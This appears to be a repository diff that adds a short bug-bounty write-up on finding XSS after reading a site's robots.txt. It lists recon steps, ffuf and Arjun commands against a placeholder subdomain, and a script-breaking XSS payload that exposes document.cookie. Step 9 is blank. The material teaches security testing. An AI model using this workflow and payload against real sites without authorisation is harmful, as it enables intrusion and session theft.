🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    CyberSecurity/Web/BountyStory/XSS/20230311 - How reading robots.txt file got me 4 XSS reports.md
     1 +# How reading robots.txt file got me 4 XSS reports? 💡💡
     2 + 
     3 +### 1. Start doing Google Dorking [Found Nothing]
     4 + 
     5 +### 2. Searched for the domain name at Wayback archive [Found Nothing]
     6 + 
     7 +### 3. Opened robots.txt file to see what the developer hide from us
     8 + 
     9 +### 4. Open source code > Search for any secrets or endpoints > [Found Nothing]
     10 + 
     11 +### 5. Open JS files > Use any tool like gospider to extract secrets and Endpoints > [Found Nothing]
     12 + 
     13 +### 6. Let’s FUZZ
     14 +`ffuf -u https://sub.domain.com/admin/FUZZ -w aspfiles.txt -mc 200`
     15 + 
     16 +### 7. Found Endpoint:
     17 +`https://sub.domain.com/admin/colorpicker_IEPatch.asp`
     18 + 
     19 +### 8. Use Arjun to find hidden parameter
     20 +`arjun -u https://sub.domain.com/admin/colorpicker_IEPatch.asp`
     21 + 
     22 +### 9.
     23 + 
     24 +### 10. Payload:
     25 +`</script><img src=x onerror=alert(document.cookie)>`
     26 + 
     27 + 
     28 +## Credit
     29 +Based on [Ahmed Qaramany](https://c0nqr0r.medium.com/reading-robots-txt-got-me-4-xss-reports-9fd2234c635f)'s writeup.
     30 +<br>&nbsp;
     31 + 
     32 +## Support
     33 +You can Follow [me](https://twitter.com/MeAsHacker_HNA) on twitter or
     34 +<br><br><a href="https://www.buymeacoffee.com/NafisiAslH" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" ></a>
     35 + 
Please wait...
Page is in error, reload to recover